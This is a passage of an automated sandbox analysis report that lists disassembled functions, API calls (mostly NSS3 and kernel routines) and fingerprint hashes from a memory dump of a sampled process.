                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strcmpstrncmp$FlagL_strncasecmpfree$Strip$ParameterSecureSkip
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3779992554-0
                                                                                                                                                                                                                                                            • Opcode ID: e80be4fcc7944c421f003c9c2e6e251db5224472f5c282964ce4dace0bb727cd
                                                                                                                                                                                                                                                            • Instruction ID: ede03ae0b202641549f46e8bf84d45c1bc8779c93188715a367b14a02cf92dc0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e80be4fcc7944c421f003c9c2e6e251db5224472f5c282964ce4dace0bb727cd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A4151F2E04219ABEF10CFE5C851B9EB7B8AF09345F040465F814A7270EB39E980D761
                                                                                                                                                                                                                                                            Function 6BF14B00 Relevance: 7.6, APIs: 5, Instructions: 119stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE09A,00000000,-00000001,00000000,?,?,6BF07B3B,00000000,?,?,00000000), ref: 6BF14BA3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18970: TlsGetValue.KERNEL32(?,00000000,6BEC61C4,?,6BEC5639,00000000), ref: 6BF18991
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18970: TlsGetValue.KERNEL32(?,?,?,?,?,6BEC5639,00000000), ref: 6BF189AD
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6BEC5639,00000000), ref: 6BF189C6
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18970: PR_WaitCondVar.NSS3 ref: 6BF189F7
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6BEC5639,00000000), ref: 6BF18A0C
                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6BF14B44
                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6BF14B7E
                                                                                                                                                                                                                                                            • SECMOD_DestroyModule.NSS3(00000000), ref: 6BF14C44
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BF14C54
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Valuestrcmp$CondCriticalDestroyEnterErrorModuleSectionUnlockWaitfree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3094473128-0
                                                                                                                                                                                                                                                            • Opcode ID: 61b32392aedd694c4daffce74dcdfef791a72281724b0149e38bc1b11c6ec0a4
                                                                                                                                                                                                                                                            • Instruction ID: 2c446c8b3d5dea265c0ce67963fe14ea3fff5a077637ea1002e88ef2eae61ef2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61b32392aedd694c4daffce74dcdfef791a72281724b0149e38bc1b11c6ec0a4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 144181B7A082059BDB10CF68D945716B3B5AF8071CF148964DC29AB320E739F910CFD1
                                                                                                                                                                                                                                                            Function 6BFDAA70 Relevance: 7.6, APIs: 5, Instructions: 114COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6BFDAA86
                                                                                                                                                                                                                                                              • Part of subcall function 6BF6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BF6C2BF
                                                                                                                                                                                                                                                              • Part of subcall function 6BFDA690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6BFDA662), ref: 6BFDA69E
                                                                                                                                                                                                                                                              • Part of subcall function 6BFDA690: PR_NewCondVar.NSS3(?), ref: 6BFDA6B4
                                                                                                                                                                                                                                                            • PR_IntervalNow.NSS3 ref: 6BFDAAEC
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BFDAB0A
                                                                                                                                                                                                                                                            • _PR_MD_NOTIFY_CV.NSS3(?), ref: 6BFDAB67
                                                                                                                                                                                                                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6BFDAB8B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CondCriticalEnterErrorIntervalSectionValuecalloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 318662135-0
                                                                                                                                                                                                                                                            • Opcode ID: 065b3c3f72ffd62609efcdbd5d1431867f5a8795d8e2a7a167abc4ca818a5ccd
                                                                                                                                                                                                                                                            • Instruction ID: b3e064695078a2bbe4220f1f602bde2011680fde73f6571b1649da5973a69dec
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 065b3c3f72ffd62609efcdbd5d1431867f5a8795d8e2a7a167abc4ca818a5ccd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F84191B6A00706CFC750DF28C88050ABBF6FF48714758866AE91ACB322E775EC41CB90
                                                                                                                                                                                                                                                            Function 6BFD1A00 Relevance: 7.6, APIs: 5, Instructions: 114COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_Lock.NSS3(?), ref: 6BFD1A13
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6BEB1A48), ref: 6BF89BB3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6BEB1A48), ref: 6BF89BC8
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6BFD1A28
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6BFD1A36
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6BFD1A5B
                                                                                                                                                                                                                                                            • PR_NotifyCondVar.NSS3(?), ref: 6BFD1B20
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Error$CondCriticalEnterLockNotifySectionUnlockValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2147238883-0
                                                                                                                                                                                                                                                            • Opcode ID: 906541c542dfbbe5dfb42e97cefb75189ca2cefd0779ab24e9e78a5587008eac
                                                                                                                                                                                                                                                            • Instruction ID: a87978308ecd3c8d9a2b7729626d4506bf1520ebdf344309dbffa859ba0e2480
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 906541c542dfbbe5dfb42e97cefb75189ca2cefd0779ab24e9e78a5587008eac
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8541C276A005269BCB10CF58C881A5AF3B1FF84314F29826ADC19AB360E735FD11CBC1
                                                                                                                                                                                                                                                            Function 6BEC6AF0 Relevance: 7.6, APIs: 5, Instructions: 81memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SECITEM_ArenaDupItem_Util.NSS3(00000000,6BECB21D,00000000,00000000,6BECB219,?,6BEC6BFB,00000000,?,00000000,00000000,?,?,?,6BECB21D), ref: 6BEC6B01
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6BF1FE08
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6BF1FE1D
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6BF1FE62
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,6BECB219,?,6BEC6BFB,00000000,?,00000000,00000000,?,?,?,6BECB21D), ref: 6BEC6B36
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000030), ref: 6BEC6B47
                                                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6BEC6B8A
                                                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000004,?,0000001C), ref: 6BEC6BB6
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Arena$Alloc_Item_$DecodeQuick$Errormemcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1773792728-0
                                                                                                                                                                                                                                                            • Opcode ID: fa4bc84e1c3cf6ce0fb9ef941ac4d67a45184ee71a9a6d8963bf2f17d976e14d
                                                                                                                                                                                                                                                            • Instruction ID: eb660e87f16c6808c279d8eb9d8ee834ff93037b12e21bbe0f9e3271fbb630f5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa4bc84e1c3cf6ce0fb9ef941ac4d67a45184ee71a9a6d8963bf2f17d976e14d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC2103729003159FEB108FA4CE40F777BA8DB45798F144969EC2897321F739EA618BA1
                                                                                                                                                                                                                                                            Function 6BF34BB0 Relevance: 7.6, APIs: 5, Instructions: 80memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000400,C083F089), ref: 6BF34BDD
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BEC87ED,00000800,6BEBEF74,00000000), ref: 6BF21000
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PR_NewLock.NSS3(?,00000800,6BEBEF74,00000000), ref: 6BF21016
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PL_InitArenaPool.NSS3(00000000,security,6BEC87ED,00000008,?,00000800,6BEBEF74,00000000), ref: 6BF2102B
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,C083F089), ref: 6BF34C03
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF210F3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: EnterCriticalSection.KERNEL32(?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2110C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PL_ArenaAllocate.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21141
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PR_Unlock.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21182
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2119C
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,C083F089), ref: 6BF34C15
                                                                                                                                                                                                                                                            • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,C083F089), ref: 6BF34C3E
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6BF1F0C8
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BF1F122
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,C083F089), ref: 6BF34C85
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Arena_$ArenaFree$Value$Alloc_AllocateCriticalEncodeEnterInitItem_LockPoolSectionUnlockcallocmemset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 227267669-0
                                                                                                                                                                                                                                                            • Opcode ID: 8a0c884682a9fe8776a375814fb32639b29e3b9f3041e13e00b35105d82a9055
                                                                                                                                                                                                                                                            • Instruction ID: afda8e0b68ebe15409c59f9db606fe8fc133b5be03b019f6c487ebfb7c4a3a5f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a0c884682a9fe8776a375814fb32639b29e3b9f3041e13e00b35105d82a9055
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0921D8B3A002216BEB100E75AC42F6B7A98DF41798F080174FD28D72B1F77BD91086D5
                                                                                                                                                                                                                                                            Function 6BECB910 Relevance: 7.6, APIs: 5, Instructions: 80memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6BECB91B
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BEC87ED,00000800,6BEBEF74,00000000), ref: 6BF21000
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PR_NewLock.NSS3(?,00000800,6BEBEF74,00000000), ref: 6BF21016
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PL_InitArenaPool.NSS3(00000000,security,6BEC87ED,00000008,?,00000800,6BEBEF74,00000000), ref: 6BF2102B
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6BECB92C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF210F3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: EnterCriticalSection.KERNEL32(?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2110C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PL_ArenaAllocate.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21141
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PR_Unlock.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21182
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2119C
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BECB95D
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6BECB96B
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,?), ref: 6BECB98B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ArenaUtil$Alloc_Arena_Value$AllocateCriticalEnterErrorFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1641347807-0
                                                                                                                                                                                                                                                            • Opcode ID: 84cba733e65e1558389cafed3f405ed9de3c7bb1a2350e5413ce79a73e18b8d8
                                                                                                                                                                                                                                                            • Instruction ID: f1c83a75bb1d64076e15b1ec8700a86a738d7a9290a304f42c2f38e11cab8127
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84cba733e65e1558389cafed3f405ed9de3c7bb1a2350e5413ce79a73e18b8d8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB21C131A006099EE320CF75CD41B23B3E8EF46759F24C569D869D7251E739E802C7A2
                                                                                                                                                                                                                                                            Function 6BEE3AD0 Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,6BEE5089,6BEDF39B,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6BEE3AF1
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,6BEE5089,6BEDF39B,00000000), ref: 6BEE3B0A
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,6BEE5089,6BEDF39B,00000000), ref: 6BEE3B1F
                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,?,?,?,6BEE5089,6BEDF39B,00000000), ref: 6BEE3B50
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,6BEE5089,6BEDF39B,00000000), ref: 6BEE3B5C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$DeleteEnterUnlockValuefree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 460358995-0
                                                                                                                                                                                                                                                            • Opcode ID: 4772bb0c283654cdfa70e91a13f71ba95603682a60e893a471d84eabce196d3f
                                                                                                                                                                                                                                                            • Instruction ID: b3e449d19214a85dd01c0a65573097c32b18af8c7d8d1bfecc1a2f42dd0bb1e2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4772bb0c283654cdfa70e91a13f71ba95603682a60e893a471d84eabce196d3f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 673128B8604A01DFCB00AF78D589919BBF4FF04354F154968EC859B311EB38F895CBA2
                                                                                                                                                                                                                                                            Function 6BED3920 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6BED3939
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BEC87ED,00000800,6BEBEF74,00000000), ref: 6BF21000
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PR_NewLock.NSS3(?,00000800,6BEBEF74,00000000), ref: 6BF21016
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PL_InitArenaPool.NSS3(00000000,security,6BEC87ED,00000008,?,00000800,6BEBEF74,00000000), ref: 6BF2102B
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6BED394D
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF210F3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: EnterCriticalSection.KERNEL32(?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2110C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PL_ArenaAllocate.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21141
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PR_Unlock.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21182
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2119C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF024E0: TlsGetValue.KERNEL32 ref: 6BF024FF
                                                                                                                                                                                                                                                              • Part of subcall function 6BF024E0: EnterCriticalSection.KERNEL32(?), ref: 6BF0250F
                                                                                                                                                                                                                                                              • Part of subcall function 6BF024E0: PR_Unlock.NSS3(?), ref: 6BF0253C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF024E0: PR_SetError.NSS3(00000000,00000000), ref: 6BF02554
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6BED39A3
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6BED39BE
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BED39CB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
